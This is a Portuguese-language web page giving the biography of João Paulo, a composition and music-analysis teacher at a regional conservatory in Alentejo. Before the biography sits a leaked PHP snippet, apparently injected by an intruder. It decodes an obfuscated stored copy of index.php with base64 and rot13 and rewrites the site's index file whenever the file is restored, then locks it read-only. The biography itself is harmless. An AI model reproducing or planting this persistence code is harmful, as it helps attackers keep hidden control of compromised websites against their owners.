$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } João Paulo – Análise e Técnicas de Composição – Conservatório Regional do Baixo Alentejo

João Paulo – Análise e Técnicas de Composição

Natural de Évora inicia os seus estudos musicais como percussionista na Banda Filarmónica de Aveiras de Cima com o Maestro Manuel Valério, aos 13 anos de idade.

Em 2001, ingressa na Escola Profissional de Música de Évora no Curso de Percussão com a professora Fátima Pinto e o professor Vasco Ramalho. Nesta altura estuda ainda Trompa como instrumento secundário com o professor Jorge Barradas.

Entre 2004 e 2007, frequenta no Conservatório Regional de Évora – Eborae Mvsica o curso complementar de Formação Musical com a professora Kristīne Vecenāne Gonçalves. Durante este período estuda piano com o professor Tito Gonçalves, Técnica Vocal com a professora Natasa Sibalic, História da Música com o professor Octávio Martins, Coro com a professora Sandra Medeiros, Acústica Musical e Análise e Técnicas de Composição com o professor João Nascimento.

Em 2007, ingressa na Universidade de Évora no Curso de Composição na classe do professor Christopher Bochmann. Durante a licenciatura estuda com professores como Roberto Pérez, Amílcar Vasques Dias, Benoît Gibson, Pedro Amaral, Eduardo Lopes, Yan Mirkitumov e José Bettencourt da Câmara.

Entre 2006 e 2012, trabalhou como professor de música nas AEC’s nas escolas primárias em Évora e Montemor-o-Novo.

Desde 2012, leciona as disciplinas de Formação Musical, Classe de Conjunto e Análise e Técnicas de Composição no Conservatório Regional do Alto Alentejo em Reguengos de Monsaraz.

Em 2015, inicia na Universidade de Évora o Mestrado em Ensino da Música no Ramo de Composição com o professor Christopher Bochmann. Durante o mestrado, realiza o estágio na disciplina de Análise e Técnicas de Composição com o professor Roberto Pérez no Conservatório Regional do Baixo Alentejo em Beja.

Desde 2016 que assume o cargo de maestro na Banda da Associação Filarmónica Liberalitas Julia e da Banda Filarmónica 1º de Abril Vimieirense desde 2017.

Desde 2019, lecciona a disciplina de Análise e Técnicas de Composição no Conservatório Regional do Baixo Alentejo.

Leave a Reply

Your email address will not be published.